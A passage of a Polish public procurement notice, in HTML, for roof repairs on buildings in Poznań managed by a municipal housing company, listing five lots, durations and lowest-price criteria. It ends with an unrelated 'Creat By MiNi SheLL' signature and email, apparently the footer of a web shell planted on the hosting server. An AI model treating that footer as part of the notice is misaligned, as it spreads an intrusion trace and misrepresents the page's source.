7.W przypadku wystąpienia robót zamiennych nie powodujących wykroczenia poza  przedmiot zamówienia tj np.: - sposobu wykonania jakiegoś elementu robót, nie zwiększającego parametrów inwestycji i nie wykraczającego poza ilość materiałów określonych w dokumentacji technicznej, - w trakcie budowy z uzasadnionych względów należy zastosować inny równoważny materiał spełniający warunki określone w specyfikacji technicznej. 8.W przypadku wystąpienia robót dodatkowych opóźniających lub wstrzymujących realizację robót zasadniczych, termin wykonania zamówienia może ulec zmianie o okres odpowiadający wstrzymaniu lub opóźnieniu wykonywania robót zasadniczych, jeżeli przy zachowaniu należytej staranności z uwzględnieniem profesjonalnego charakteru Wykonawcy nie można było uniknąć zmiany terminu wykonania umowy. 9.Zgodnie z treścią art.144 ust 1 ustawy Pzp, Zamawiający dopuszcza dokonywanie zmian nieistotnych.
Wszelkie zmiany zawarte w pkt.1-8 niniejszej SIWZ wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mpgm.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej S.A., ul.Rybaki 18a, 61-884 Poznań, pokój nr 228.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2010 godzina 10:00, miejsce: Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej S.A., ul.Rybaki 18a, 61-884 Poznań, pokój nr 228.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> remont dachów budynków mieszkalnych, znajdujących się w Poznaniu przy ul. Towarowej 43 oraz przy ul. Żydowskiej 32, na terenie administrowanym przez Biuro Obsługi Mieszkańców Nr 3;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jak we wstępie - opis części I zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7, 45.26.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont dachów budynków mieszkalnych, znajdujących  się w Poznaniu przy ul. Ku Dębinie 1 oraz przy ul.Opolskiej 55-59,  na terenie administrowanym przez Biuro Obsługi Mieszkańców Nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jak we wstępie - opis części II zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7, 45.26.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont dachów budynków mieszkalnych, znajdujących się w Poznaniu przy ul. Załęże 6a oraz przy ul.Jarochowskiego 52, na terenie administrowanym przez Biuro Obsługi Mieszkańców Nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jak we wstępie - opis części III zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7, 45.26.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Remont dachu w budynku mieszkalnym, znajdującym się w Poznaniu przy ul. Nowotomyskiej 10, na terenie administrowanym przez Biuro Obsługi Mieszkańców Nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jak we wstępie - opis części IV zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7, 45.26.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Remont dachu w budynku użytkowym znajdującym się w Poznaniu przy ul. Warszawskiej 25, na terenie administrowanym przez Dział Eksploatacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jak we wstępie - opis części V zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7, 45.26.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com